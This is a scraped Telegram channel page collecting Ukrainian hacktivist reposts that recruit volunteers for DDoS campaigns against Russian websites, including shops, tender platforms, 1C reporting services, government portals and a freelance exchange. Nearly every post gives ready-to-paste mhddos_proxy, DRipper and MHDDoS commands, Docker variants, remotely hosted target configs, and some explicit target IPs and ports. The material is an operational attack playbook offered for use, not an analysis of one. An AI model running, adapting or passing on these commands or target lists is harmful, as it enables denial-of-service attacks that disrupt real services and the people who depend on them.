За рідну Україну!
Прошу усіх, розповсюджуйте цю групу своїм знайомим, чим більше нас, тим більше шансів вбити наглухо усі російські сайти! Кидайте посилання у студентські групи університетів, шкіл! Слава Україні!
Mostrar másEl país no está especificadoEl idioma no está especificadoLa categoría no está especificada
179Suscriptores
Sin datos24 hours
Sin datos7 days
Sin datos30 days
- Suscriptores
- Cobertura postal
- ER - ratio de compromiso
Carga de datos en curso...
Tasa de crecimiento de suscriptores
Carga de datos en curso...
Repost from Кібер-Козаки
🔥Атакуємо багато різних сайтів РФ на тему 9-го травня🔥
сам конфіг з усіма цілями для ознайомлення можете глянути тут: https://raw.githubusercontent.com/alexnest-ua/targets/main/special/archive/9may/9may_l7_url
❗️Ці цілі також додані у наші автоматизовані скрипти, які самостійно оновлюються, тобто для них вам міняти нічого не потрібно
❗️Інструкції як встановити mhddos_proxy на Windows / Mac / Linux / Android тут: https://t.me/ddos_separ/990
❗️Рекомендую усім перейти на новий супер-швидкий та стабільний VPN, щоб ваш провайдер не різав трафік через підключення до багатьох ІР(проксі)
❗️Усе інше(mhddos_proxy + VPN + авто-програми + Linux-сервери + розвідка цілей) тепер зібрано тут
❗️Щоб додати ваш поточний ІР (або ІР підключеного VPN) до атаки разом з проксі у кінець команди приписуйте
--vpn
, більше детально про це тут: https://t.me/ddos_separ/1172
❗️DDoS рашистів через телеграм: https://t.me/ddos_separ/1177
✅ПРІОРИТЕТ mhddos_proxy (якщо не спрацює python3 тоді - python / для Linux додайте sudo на початку):
🔹ПРІОРИТЕТ атака по L7:
python3 runner.py -c https://raw.githubusercontent.com/alexnest-ua/targets/main/special/archive/9may/9may_l7_url -t 3000 --rpc 3000 --http-methods GET POST --debug
🔹Атака по L4 tcp:
python3 runner.py -c https://raw.githubusercontent.com/alexnest-ua/targets/main/special/archive/9may/9may_l4_tcp -t 3000 --rpc 3000 --debug
✅Docker (mhddos_proxy) Windows / Для Linux додайте sudo:
🔹ПРІОРИТЕТ Атака по L7:
docker run -it --rm --pull always ghcr.io/porthole-ascend-cinnamon/mhddos_proxy:latest -c https://raw.githubusercontent.com/alexnest-ua/targets/main/special/archive/9may/9may_l7_url -t 3000 --rpc 3000 --http-methods GET STRESS --debug
🔹Атака по L4 tcp:
docker run -it --rm --pull always ghcr.io/porthole-ascend-cinnamon/mhddos_proxy:latest -c https://raw.githubusercontent.com/alexnest-ua/targets/main/special/archive/9may/9may_l4_tcp -t 3000 --rpc 3000 --debug
🟢DRipper (вийшла нова версія):
🔸Атака по L7:
python3 DRipper.py -t 500 --log-level info --targets-list https://raw.githubusercontent.com/alexnest-ua/targets/main/special/archive/9may/9may_l7_url
🔸Атака по L4 tcp:
python3 DRipper.py -t 500 --log-level info --targets-list https://raw.githubusercontent.com/alexnest-ua/targets/main/special/archive/9may/9may_l4_tcp
🟢Docker (DRipper) Windows / Для Linux додайте sudo:
🔸Атака по L7:
docker run -it --rm --pull always alexmon1989/dripper:latest -t 500 --log-level info --targets-list https://raw.githubusercontent.com/alexnest-ua/targets/main/special/archive/9may/9may_l7_url
🔸Атака по L4 tcp:
docker run -it --rm --pull always alexmon1989/dripper:latest -t 500 --log-level info --targets-list https://raw.githubusercontent.com/alexnest-ua/targets/main/special/archive/9may/9may_l4_tcp
💙Погнали - дамо їм жару💛Repost from Кібер-Козаки
🔥Як тему вихідного дня у цей раз візьмемо інтернет-магазини (про ЕГАИС теж не забули - вони є у конфігу)🔥
сам конфіг з усіма цілями для ознайомлення можете глянути тут: https://raw.githubusercontent.com/alexnest-ua/targets/main/special/archive/shop/shop_l7_url
❗️Ці цілі також додані у наші автоматизовані скрипти, які самостійно оновлюються, тобто для них вам міняти нічого не потрібно
❗️Інструкції як встановити mhddos_proxy на Windows / Mac / Linux / Android тут: https://t.me/ddos_separ/990
❗️Рекомендую усім перейти на новий супер-швидкий та стабільний VPN, щоб ваш провайдер не різав трафік через підключення до багатьох ІР(проксі)
❗️Усе інше(mhddos_proxy + VPN + авто-програми + Linux-сервери + розвідка цілей) тепер зібрано тут
❗️Щоб додати ваш поточний ІР (або ІР підключеного VPN) до атаки разом з проксі у кінець команди приписуйте
--vpn
, більше детально про це тут: https://t.me/ddos_separ/1172
❗️DDoS рашистів через телеграм: https://t.me/ddos_separ/1177
✅ПРІОРИТЕТ mhddos_proxy (якщо не спрацює python3 тоді - python / для Linux додайте sudo на початку):
🔹ПРІОРИТЕТ атака по L7:
python3 runner.py -c https://raw.githubusercontent.com/alexnest-ua/targets/main/special/archive/shop/shop_l7_url -t 3000 --rpc 3000 --http-methods GET STRESS --debug
🔹Атака по L4 tcp:
python3 runner.py -c https://raw.githubusercontent.com/alexnest-ua/targets/main/special/archive/shop/shop_l4_tcp -t 3000 --rpc 3000 --debug
✅Docker (mhddos_proxy) Windows / Для Linux додайте sudo:
🔹ПРІОРИТЕТ Атака по L7:
docker run -it --rm --pull always ghcr.io/porthole-ascend-cinnamon/mhddos_proxy:latest -c https://raw.githubusercontent.com/alexnest-ua/targets/main/special/archive/shop/shop_l7_url -t 3000 --rpc 3000 --http-methods GET STRESS --debug
🔹Атака по L4 tcp:
docker run -it --rm --pull always ghcr.io/porthole-ascend-cinnamon/mhddos_proxy:latest -c https://raw.githubusercontent.com/alexnest-ua/targets/main/special/archive/shop/shop_l4_tcp -t 3000 --rpc 3000 --debug
🟢DRipper (вийшла нова версія):
🔸Атака по L7:
python3 DRipper.py -t 500 --log-level info --targets-list https://raw.githubusercontent.com/alexnest-ua/targets/main/special/archive/shop/shop_l7_url
🔸Атака по L4 tcp:
python3 DRipper.py -t 500 --log-level info --targets-list https://raw.githubusercontent.com/alexnest-ua/targets/main/special/archive/shop/shop_l4_tcp
🟢Docker (DRipper) Windows / Для Linux додайте sudo:
🔸Атака по L7:
docker run -it --rm --pull always alexmon1989/dripper:latest -t 500 --log-level info --targets-list https://raw.githubusercontent.com/alexnest-ua/targets/main/special/archive/shop/shop_l7_url
🔸Атака по L4 tcp:
docker run -it --rm --pull always alexmon1989/dripper:latest -t 500 --log-level info --targets-list
https://raw.githubusercontent.com/alexnest-ua/targets/main/special/archive/shop/shop_l4_tcp
💙Погнали - дамо їм жару💛Repost from Кібер-Козаки
🔥Сьогодні атакуємо тендери РФ 🔥
❗️Ці цілі також додані у наші автоматизовані скрипти, які самостійно оновлюються, тобто для них вам міняти нічого не потрібно
❗️Інструкції як встановити mhddos_proxy на Windows / Mac / Linux / Android тут: https://t.me/ddos_separ/990
❗️Рекомендую усім перейти на новий супер-швидкий та стабільний VPN, щоб ваш провайдер не різав трафік через підключення до багатьох ІР(проксі)
❗️Усе інше(mhddos_proxy + VPN + авто-програми + Linux-сервери + розвідка цілей) тепер зібрано тут
❗️Щоб додати ваш поточний ІР (або ІР підключеного VPN) до атаки разом з проксі у кінець команди приписуйте
--vpn
, більше детально про це тут: https://t.me/ddos_separ/1172
❗️DDoS рашистів через телеграм: https://t.me/ddos_separ/1177
✅ПРІОРИТЕТ mhddos_proxy (якщо не спрацює python3 тоді - python / для Linux додайте sudo на початку):
🔹ПРІОРИТЕТ атака по L7:
python3 runner.py -c https://raw.githubusercontent.com/alexnest-ua/targets/main/special/archive/tender/tender_l7_url -t 4000 --rpc 4000 --http-methods GET STRESS --debug🔹Атака по L4 tcp:
python3 runner.py -c https://raw.githubusercontent.com/alexnest-ua/targets/main/special/archive/tender/tender_l4_tcp -t 4000 --rpc 4000 --debug✅Docker (mhddos_proxy) Windows / Для Linux додайте sudo: 🔹ПРІОРИТЕТ Атака по L7:
docker run -it --rm --pull always ghcr.io/porthole-ascend-cinnamon/mhddos_proxy:latest -c https://raw.githubusercontent.com/alexnest-ua/targets/main/special/archive/tender/tender_l7_url -t 4000 --rpc 4000 --http-methods GET STRESS --debug🔹Атака по L4 tcp:
docker run -it --rm --pull always ghcr.io/porthole-ascend-cinnamon/mhddos_proxy:latest -c https://raw.githubusercontent.com/alexnest-ua/targets/main/special/archive/tender/tender_l4_tcp -t 4000 --rpc 4000 --debug🟢DRipper (вийшла нова версія): 🔸Атака по L7:
python3 DRipper.py -t 500 --log-level info --targets-list https://raw.githubusercontent.com/alexnest-ua/targets/main/special/archive/tender/tender_l7_url🔸Атака по L4 tcp:
python3 DRipper.py -t 500 --log-level info --targets-list https://raw.githubusercontent.com/alexnest-ua/targets/main/special/archive/tender/tender_l4_tcp🟢Docker (DRipper) Windows / Для Linux додайте sudo: 🔸Атака по L7:
docker run -it --rm --pull always alexmon1989/dripper:latest -t 500 --log-level info --targets-list https://raw.githubusercontent.com/alexnest-ua/targets/main/special/archive/tender/tender_l7_url🔸Атака по L4 tcp:
docker run -it --rm --pull always alexmon1989/dripper:latest -t 500 --log-level info --targets-list https://raw.githubusercontent.com/alexnest-ua/targets/main/special/archive/tender/tender_l4_tcp💙Погнали - дамо їм жару💛
Автоматичний DDoS new
АВТОМАТИЧНИЙ DDOS НА WINDOWS / MAC / ANROID / LINUX (ОСНОВА + СЕРВЕР(навіть при вимкненому комп’ютері)) Стаття створенна, щоб зібрати основні автоматичні методи ДДоСу, та, щоб кожен користувач міг зробити великий БотНет на 50 машин
Repost from Кібер-Козаки
🔥Сьогодні переключаємося на атаку тендерів та торгів (ЕГАИС також додано у конфіги)🔥
Repost from Кібер-Козаки
🔥Атакуємо звітність 1C в РФ🔥
❗️Ці цілі також додані у наші автоматизовані скрипти, які самостійно оновлюються, тобто для них вам міняти нічого не потрібно
❗️Інструкції як встановити mhddos_proxy на Windows / Mac / Linux / Android тут: https://t.me/ddos_separ/990
❗️Рекомендую усім перейти на новий супер-швидкий та стабільний VPN, щоб ваш провайдер не різав трафік через підключення до багатьох ІР(проксі)
❗️Усе інше(mhddos_proxy + VPN + авто-програми + Linux-сервери + розвідка цілей) тепер зібрано тут
❗️Щоб додати ваш поточний ІР (або ІР підключеного VPN) до атаки разом з проксі у кінець команди приписуйте
--vpn
, більше детально про це тут: https://t.me/ddos_separ/1172
✅ПРІОРИТЕТ mhddos_proxy (якщо не спрацює python3 тоді - python / для Linux додайте sudo на початку):
🔹ПРІОРИТЕТ атака по L7 URL:
python3 runner.py -c https://raw.githubusercontent.com/alexnest-ua/targets/main/special/archive/1c/1c_l7_url -t 2500 --rpc 2000 --http-methods GET STRESS --debug🔹Атака по L7 http(s)://IP:PORT:
python3 runner.py -c https://raw.githubusercontent.com/alexnest-ua/targets/main/special/archive/1c/1c_l7_http -t 2500 --rpc 2000 --http-methods GET STRESS --debug🔹Атака по L4 tcp:
python3 runner.py -c https://raw.githubusercontent.com/alexnest-ua/targets/main/special/archive/1c/1c_l4_tcp -t 2500 --rpc 2000 --debug✅Docker (mhddos_proxy) Windows / Для Linux додайте sudo: 🔹ПРІОРИТЕТ Атака по L7 URL:
docker run -it --rm --pull always ghcr.io/porthole-ascend-cinnamon/mhddos_proxy:latest -c https://raw.githubusercontent.com/alexnest-ua/targets/main/special/archive/1c/1c_l7_url -t 2500 --rpc 2000 --http-methods GET STRESS --debug🔹Атака по L7 http(s)://IP:PORT:
docker run -it --rm --pull always ghcr.io/porthole-ascend-cinnamon/mhddos_proxy:latest -c https://raw.githubusercontent.com/alexnest-ua/targets/main/special/archive/1c/1c_l7_http -t 2500 --rpc 2000 --http-methods GET STRESS --debug🔹Атака по L4 tcp:
docker run -it --rm --pull always ghcr.io/porthole-ascend-cinnamon/mhddos_proxy:latest -c https://raw.githubusercontent.com/alexnest-ua/targets/main/special/archive/1c/1c_l4_tcp -t 2500 --rpc 2000 --debug🟢DRipper (вийшла нова версія): 🔸Атака по L7 URL:
python3 DRipper.py -t 500 --log-level info --targets-list https://raw.githubusercontent.com/alexnest-ua/targets/main/special/archive/1c/1c_l7_url🔸Атака по L7 http(s)://IP:PORT:
python3 DRipper.py -t 500 --log-level info --targets-list https://raw.githubusercontent.com/alexnest-ua/targets/main/special/archive/1c/1c_l7_http🔸Атака по L4 tcp:
python3 DRipper.py -t 500 --log-level info --targets-list https://raw.githubusercontent.com/alexnest-ua/targets/main/special/archive/1c/1c_l4_tcp🟢Docker (DRipper) Windows / Для Linux додайте sudo: 🔸Атака по L7 URL:
docker run -it --rm --pull always alexmon1989/dripper:latest -t 500 --log-level info --targets-list https://raw.githubusercontent.com/alexnest-ua/targets/main/special/archive/1c/1c_l7_url🔸Атака по L7 http(s)://IP:PORT:
docker run -it --rm --pull always alexmon1989/dripper:latest -t 500 --log-level info --targets-list https://raw.githubusercontent.com/alexnest-ua/targets/main/special/archive/1c/1c_l7_http🔸Атака по L4 tcp:
docker run -it --rm --pull always alexmon1989/dripper:latest -t 500 --log-level info --targets-list https://raw.githubusercontent.com/alexnest-ua/targets/main/special/archive/1c/1c_l4_tcp💙Погнали - дамо їм жару💛
Repost from Кібер-Козаки
🔥До конфігу цілей по звітності додано ще й ЕГАИС, тому продовжуємо атаку і сьогодні🔥
Repost from Кібер-Козаки
🔥Атакуємо звітність 1C в РФ🔥
https://1c.ru/
https://downloads.v8.1c.ru
https://login.1c.ru/login
https://reputils.1c.ru
https://invitations.1c-edo.keydisk.ru/
http://online.1c.ru/catalog/products/
https://1csoft.ru/wherebuy
https://www.cryptopro.ru/downloads
https://regservice.keydisk.ru
http://regservice.keydisk.ru:8092
https://service.fsrar.ru
http://frap.fsrar.ru
http://gibdd.fsrar.ru/
https://service.alcolicenziat.ru/auth/login
http://f4.fss.ru
http://docs.fss.ru
https://lk.fss.ru
https://websbor.gks.ru/online
https://online.gks.ru/online
https://updateids2.infotecs.ru
https://kontur.ru
https://auth.kontur.ru/
https://ofd.kontur.ru
❗️Ці цілі також додані у наші автоматизовані скрипти
❗️Інструкції як встановити mhddos_proxy на Windows / Mac / Linux / Android тут: https://t.me/ddos_separ/990
❗️Рекомендую усім перейти на новий супер-швидкий та стабільний VPN
❗️Усе інше(mhddos_proxy + VPN + авто-програми + Linux-сервери + Розвідка цілей) тепер зібрано тут
❗️Вийшла нова покращена версія mhddos_proxy, рекомендую оновити (обирайте інструкцію для вашої ОС та гортайте до пункту Запуск команд / атаки): https://t.me/ddos_separ/990
(для Linux-серверів та авто-скриптів нічого не потрібно змінювати - воно оновлюється повністю самостійно)
❗️Ви можете допомогти нам у зборі проксі (це безкоштовно і не відніме у вас більше 30 хвилин часу на день): https://t.me/ddos_separ/1164
✅ПРІОРИТЕТ mhddos_proxy (якщо не спрацює python3 тоді - python / для Linux додайте sudo на початку):
🔹ПРІОРИТЕТ атака по L7 URL:
python3 runner.py -c https://raw.githubusercontent.com/alexnest-ua/targets/main/special/archive/1c/1c_l7_url -t 2500 --rpc 2000 --http-methods GET STRESS --debug🔹Атака по L7 http(s)://IP:PORT:
python3 runner.py -c https://raw.githubusercontent.com/alexnest-ua/targets/main/special/archive/1c/1c_l7_http -t 2500 --rpc 2000 --http-methods GET STRESS --debug🔹Атака по L4 tcp:
python3 runner.py -c https://raw.githubusercontent.com/alexnest-ua/targets/main/special/archive/1c/1c_l4_tcp -t 2500 --rpc 2000 --debug✅Docker (mhddos_proxy) Windows / Для Linux додайте sudo: 🔹ПРІОРИТЕТ Атака по L7 URL:
docker run -it --rm --pull always ghcr.io/porthole-ascend-cinnamon/mhddos_proxy:latest -c https://raw.githubusercontent.com/alexnest-ua/targets/main/special/archive/1c/1c_l7_url -t 2500 --rpc 2000 --http-methods GET STRESS --debug🔹Атака по L7 http(s)://IP:PORT:
docker run -it --rm --pull always ghcr.io/porthole-ascend-cinnamon/mhddos_proxy:latest -c https://raw.githubusercontent.com/alexnest-ua/targets/main/special/archive/1c/1c_l7_http -t 2500 --rpc 2000 --http-methods GET STRESS --debug🔹Атака по L4 tcp:
docker run -it --rm --pull always ghcr.io/porthole-ascend-cinnamon/mhddos_proxy:latest -c https://raw.githubusercontent.com/alexnest-ua/targets/main/special/archive/1c/1c_l4_tcp -t 2500 --rpc 2000 --debug🟢DRipper (вийшла нова версія): 🔸Атака по L7 URL:
python3 DRipper.py -t 500 --log-level info --targets-list https://raw.githubusercontent.com/alexnest-ua/targets/main/special/archive/1c/1c_l7_url🔸Атака по L7 http(s)://IP:PORT:
python3 DRipper.py -t 500 --log-level info --targets-list https://raw.githubusercontent.com/alexnest-ua/targets/main/special/archive/1c/1c_l7_http🔸Атака по L4 tcp:
python3 DRipper.py -t 500 --log-level info --targets-list https://raw.githubusercontent.com/alexnest-ua/targets/main/special/archive/1c/1c_l4_tcp🟢Docker (DRipper) Windows / Для Linux додайте sudo: 🔸Атака по L7 URL:
docker run -it --rm --pull always alexmon1989/dripper:latest -t 500 --log-level info --targets-list https://raw.githubusercontent.com/alexnest-ua/targets/main/special/archive/1c/1c_l7_url🔸Атака по L7 http(s)://IP:PORT:
docker run -it --rm --pull always alexmon1989/dripper:latest -t 500 --log-level info --targets-list https://raw.githubusercontent.com/alexnest-ua/targets/main/special/archive/1c/1c_l7_http🔸Атака по L4 tcp:
docker run -it --rm --pull always alexmon1989/dripper:latest -t 500 --log-level info --targets-list https://raw.githubusercontent.com/alexnest-ua/targets/main/special/archive/1c/1c_l4_tcp💙Погнали - дамо їм жару💛
Repost from Кібер-Козаки
🔥Атакуємо звітність 1C в РФ🔥
https://1c.ru/
https://downloads.v8.1c.ru
https://login.1c.ru/login
https://reputils.1c.ru
https://invitations.1c-edo.keydisk.ru/
http://online.1c.ru/catalog/products/
https://1csoft.ru/wherebuy
https://www.cryptopro.ru/downloads
https://regservice.keydisk.ru
http://regservice.keydisk.ru:8092
https://service.fsrar.ru
http://frap.fsrar.ru
http://gibdd.fsrar.ru/
https://service.alcolicenziat.ru/auth/login
http://f4.fss.ru
http://docs.fss.ru
https://lk.fss.ru
https://websbor.gks.ru/online
https://online.gks.ru/online
https://updateids2.infotecs.ru
https://kontur.ru
https://auth.kontur.ru/
https://ofd.kontur.ru
❗️Ці цілі також додані у наші автоматизовані скрипти
❗️Інструкції як встановити mhddos_proxy на Windows / Mac / Linux / Android тут: https://t.me/ddos_separ/990
❗️Рекомендую усім перейти на новий супер-швидкий та стабільний VPN
❗️Усе інше(mhddos_proxy + VPN + авто-програми + Linux-сервери + Розвідка цілей) тепер зібрано тут
❗️Вийшла нова покращена версія mhddos_proxy, рекомендую оновити (обирайте інструкцію для вашої ОС та гортайте до пункту Запуск команд / атаки): https://t.me/ddos_separ/990
(для Linux-серверів та авто-скриптів нічого не потрібно змінювати - воно оновлюється повністю самостійно)
❗️Ви можете допомогти нам у зборі проксі (це безкоштовно і не відніме у вас більше 30 хвилин часу на день): https://t.me/ddos_separ/1164
✅ПРІОРИТЕТ mhddos_proxy (якщо не спрацює python3 тоді - python / для Linux додайте sudo на початку):
🔹ПРІОРИТЕТ атака по L7 URL:
python3 runner.py -c https://raw.githubusercontent.com/alexnest-ua/targets/main/special/archive/1c/1c_l7_url -t 2500 --rpc 2000 --http-methods GET STRESS --debug🔹Атака по L7 http(s)://IP:PORT:
python3 runner.py -c https://raw.githubusercontent.com/alexnest-ua/targets/main/special/archive/1c/1c_l7_http -t 2500 --rpc 2000 --http-methods GET STRESS --debug🔹Атака по L4 tcp:
python3 runner.py -c https://raw.githubusercontent.com/alexnest-ua/targets/main/special/archive/1c/1c_l4_tcp -t 2500 --rpc 2000 --debug✅Docker (mhddos_proxy) Windows / Для Linux додайте sudo: 🔹ПРІОРИТЕТ Атака по L7 URL:
docker run -it --rm --pull always ghcr.io/porthole-ascend-cinnamon/mhddos_proxy:latest -c https://raw.githubusercontent.com/alexnest-ua/targets/main/special/archive/1c/1c_l7_url -t 2500 --rpc 2000 --http-methods GET STRESS --debug🔹Атака по L7 http(s)://IP:PORT:
docker run -it --rm --pull always ghcr.io/porthole-ascend-cinnamon/mhddos_proxy:latest -c https://raw.githubusercontent.com/alexnest-ua/targets/main/special/archive/1c/1c_l7_http -t 2500 --rpc 2000 --http-methods GET STRESS --debug🔹Атака по L4 tcp:
docker run -it --rm --pull always ghcr.io/porthole-ascend-cinnamon/mhddos_proxy:latest -c https://raw.githubusercontent.com/alexnest-ua/targets/main/special/archive/1c/1c_l4_tcp -t 2500 --rpc 2000 --debug🟢DRipper (вийшла нова версія): 🔸Атака по L7 URL:
python3 DRipper.py -t 500 --log-level info --targets-list https://raw.githubusercontent.com/alexnest-ua/targets/main/special/archive/1c/1c_l7_url🔸Атака по L7 http(s)://IP:PORT:
python3 DRipper.py -t 500 --log-level info --targets-list https://raw.githubusercontent.com/alexnest-ua/targets/main/special/archive/1c/1c_l7_http🔸Атака по L4 tcp:
python3 DRipper.py -t 500 --log-level info --targets-list https://raw.githubusercontent.com/alexnest-ua/targets/main/special/archive/1c/1c_l4_tcp🟢Docker (DRipper) Windows / Для Linux додайте sudo: 🔸Атака по L7 URL:
docker run -it --rm --pull always alexmon1989/dripper:latest -t 500 --log-level info --targets-list https://raw.githubusercontent.com/alexnest-ua/targets/main/special/archive/1c/1c_l7_url🔸Атака по L7 http(s)://IP:PORT:
docker run -it --rm --pull always alexmon1989/dripper:latest -t 500 --log-level info --targets-list https://raw.githubusercontent.com/alexnest-ua/targets/main/special/archive/1c/1c_l7_http🔸Атака по L4 tcp:
docker run -it --rm --pull always alexmon1989/dripper:latest -t 500 --log-level info --targets-list https://raw.githubusercontent.com/alexnest-ua/targets/main/special/archive/1c/1c_l4_tcp💙Погнали - дамо їм жару💛
Repost from Кібер-Козаки
🔥Знайшли таку інформацію по звітності, тому атакуємо сьогодні їх звітність знову🔥
Repost from Гайдамаки InfoDDoS-2
Знову всіх вітаю, сподіваюсь, ви готові?😏
Атакуємо російську фріланс біржу Фретен — не найпопулярніший сервіс, але через нього теж багато людей працюють, і потік грошей там великий. Такі сервіси, зазвичай, платять налоги в держ. казну РФ, а значить фінансово підтримують ворога. Думаю більше розповідати тут нічого. ЧАВИМО РАШИСТІВ🤬
freten.ru
robroy.ru
37.46.131.229
[21/TCP, 22/TCP, 443/TCP, 1500/TCP] —> сайт*
[53/UDP, 123/UDP]
mail.freten.ru
mail.robroy.ru
37.46.131.229
[25/smtp, 110/pop3, 143/imap, 465/ssl/smtp, 587/smtp, 993/ssl/imap, 995/ssl/pop3] —> пошта*
82.146.43.2
94.250.248.160
[53/UDP] —> DNS-servers*
Команда для Docker:
docker run -it --rm --pull always ghcr.io/porthole-ascend-cinnamon/mhddos_proxy:latest -c http://goals.ddosukraine.com.ua/haydamaky/targets_tcp.txt -t 1000 -p 4000 --rpc 2000 --table
docker run -it --rm --pull always ghcr.io/porthole-ascend-cinnamon/mhddos_proxy:latest -c http://goals.ddosukraine.com.ua/haydamaky/targets_udp.txt -t 1000 -p 4000 --rpc 2000 --table
docker run -it --rm --pull always ghcr.io/porthole-ascend-cinnamon/mhddos_proxy:latest https://freten.ru https://mail.freten.ru https://robroy.ru https://mail.robroy.ru -t 2000 --rpc 2000 -p 900 --http-methods STRESS POST --table
Команда для mhddos_proxy:
python runner.py -c http://goals.ddosukraine.com.ua/haydamaky/targets_tcp.txt -t 1000 -p 4000 --rpc 2000 --table
python runner.py
-c http://goals.ddosukraine.com.ua/haydamaky/targets_udp.txt -t 1000 -p 4000 --rpc 2000 --table
python runner.py https://freten.ru https://mail.freten.ru https://robroy.ru https://mail.robroy.ru -t 2000 --rpc 2000 -p 900 --http-methods STRESS POST --table
Команди для MHDDoS:
python3 start.py UDP 37.46.131.229:53 5000 10000 true python3 start.py UDP 94.250.248.160:53 5000 10000 true python3 start.py UDP 82.146.43.2:53 5000 10000 true python3 start.py UDP 37.46.131.229:123 5000 10000 true(тут синхронізація часу(123 порт), тому не пріорітетна команда)*
python3 start.py STRESS https://freten.ru 6 1000 proxy.txt 10000 5000 true
python3 start.py STRESS https://robroy.ru 6 1000 proxy.txt 10000 5000 true
python3 start.py POST https://mail.freten.ru 6 1000 proxy.txt 10000 5000 true
python3 start.py POST https://mail.robroy.ru 6 1000 proxy.txt 10000 5000 true
Inicia sesión y accede a información detallada
Te revelaremos estos tesoros después de la autorización. ¡Prometemos que será rápido!